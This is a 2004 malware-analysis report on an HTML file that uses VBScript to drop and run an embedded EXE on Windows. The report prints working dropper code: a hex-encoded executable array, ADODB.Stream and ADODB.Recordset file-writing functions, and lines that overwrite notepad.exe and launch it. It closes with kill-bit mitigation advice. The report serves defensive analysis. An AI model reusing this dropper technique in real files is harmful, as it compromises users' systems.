HTML files in Local Computer Zone
by Tan Chew Keong
11 March 2004
IntroductionUsers are normally aware of the risk associated with opening unknown EXE, COM, SCR or PIF files that might contain Trojan horses. However, users usually assume that HTML files will not cause any harm to their systems and are safe to open. In this report, we analyse a HTML file containing malicious VB script that extracts and executes a malicious EXE when opened in Local Computer Zone.
Analysis
The innocent looking HTML file contains a malicious EXE file embedded using a VB script array. This is shown below.
--------------------------------------------------------------------------------
<script language="vbscript">
Dim v(133)
v(0)="4D,5A,90,00,03,00,00,00,04,00,00,00,FF,FF,00,00,B8,00,00,00,00,00,00,00,40,00,00,00,00,00,00,00,00,00,00,00,00"
v(1)="00,00,00,00,00,00,00,00,00,00,08,01,00,00,0E,1F,BA,0E,00,B4,09,CD,21,B8,01,4C,CD,21,63,61,6E,6E,6F,74,20,62,65"
v(2)="20,72,75,6E,20,69,6E,20,44,4F,53,20,6D,6F,64,65,2E,0D,0D,0A,24,00,00,00,00,00,00,00,1B,57,DD,FC,07,5B,DD,86,1B"
v(3)="57,DD,94,13,0A,DD,85,1B,57,DD,04,13,0A,DD,85,1B,57,DD,04,07,59,DD,86,1B,57,DD,E8,04,DD,FE,3A,5C,DD,84,1B,57,DD"
v(4)="FE,3A,53,DD,84,1B,57,DD,87,1B,56,DD,F4,1B,57,DD,81,38,5C,DD,84,1B,57,DD,40,1D,51,DD,00,00,00,00,00,00,00,00,00"
v(5)="00,00,00,00,00,00,00,00,00,00,00,00,00,00,50,45,00,00,4C,01,03,00,04,B1,45,3F,00,00,00,00,10,00,00,00,10,00,00"
v(6)="00,50,00,00,40,69,00,00,00,60,00,00,00,70,00,00,00,00,40,00,00,10,00,00,00,02,00,00,00,00,00,00,80,00,00,00,10"
v(7)="00,00,00,00,00,00,02,00,00,00,00,00,10,00,00,10,00,00,00,00,10,00,00,10,00,00,00,00,00,A8,78,00,00,F8,00,00,00"
v(8)="00,70,00,00,A8,08,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00"
OTHER LINES REMOVED
--------------------------------------------------------------------------------
Default installation of Internet Explorer allows the ADODB.Stream and ADODB.Recordset ActiveX controls to be instantiated in the Local Computer Zone without prompting the user. These two ActiveX controls are used by the malicious HTML file to write the embedded EXE file out to the local disk. The HTML file contains two VB functions, convToBinary and saveFile. The convToBinary function converts a VB string to a binary array object that can be used by the ADOBE.Stream ActiveX control. The saveFile function accepts a filename and a binary array object as input, and creates a binary ADOBE.Stream control to write the contains of the binary array object out to disk. These two functions are shown below.
--------------------------------------------------------------------------------
Function convToBinary(inData)
Dim rs, lenInData
Set rs = CreateObject("ADODB.Recordset")
lenInData = LenB(inData)
If lenInData > 0 Then
rs.Fields.Append "temp", 205, lenInData
rs.Open
rs.AddNew
rs.Fields("temp").AppendChunk(inData)
rs.Update
convToBinary = RS("temp").GetChunk(lenInData)
End If
End Function
Sub saveFile(FileName, ByteArray)
Dim bs
Set bs = CreateObject("ADODB.Stream")
bs.Type = 1
bs.Open
bs.Write ByteArray
bs.SaveToFile FileName, 2
End Sub
--------------------------------------------------------------------------------
The code that was used to extract the EXE file and write it out to disk is shown below. Basically, this code processes the array containing the malicious EXE (v) by splitting up each of the individual hex values and then recombining them back into a byte string. This byte string is then passed to convToBinary to get a binary array object. This binary array is written to disk using the saveFile function. Note that notepad.exe in c:\windows\system32\ and c:\winnt\system32\ will be overwritten with the malicious EXE.
Lastly, the document.write statement uses the view-source protocol to invoke notepad.exe, which has already been overwitten with the malicious EXE.
--------------------------------------------------------------------------------
on error resume next
Dim y
y = convToBinary(s)
saveFile "c:\windows\system32\notepad.exe", y
saveFile "c:\winnt\system32\notepad.exe", y
document.write("<img src=""view-source:file://c:/winnt/system32/SQLSRDME.TXT"" width=1 height=1>")
--------------------------------------------------------------------------------
Mitigation
Users should be reminded to be vigilant even when opening innocent looking HTML files. They should also avoid using their systems as Adminstrator to prevent the overwriting of notepad.exe. In addition, the kill-bit should be set for the ADOBE.Stream ActiveX control to prevent any malicious HTML files from misusing it. Setting the kill-bit will prevent IE from activating the ActiveX control and will stop the above malicious HTML from running correctly.
The CLSID of this ActiveX control is {00000566-0000-0010-8000-00AA006D2EA4}.
Information for setting the kill-bit can be found at this link. Microsoft Knowledge Base Article - 240797
Conclusion
In this report, we see that opening a malicious HTML file in Local Computer Zone can be dangerous. Scripts within the HTML file can extract an embedded malicious EXE and execute it. Ways of mitigating this risk have been suggested above.
Contacts
For further enquries or to submit malicious code for our analysis, email them to the following.
Overall-in-charge: Tan Chew Keong
Updated: 11/3/2004
webmaster@security.org.sg
推荐
评论(0条)
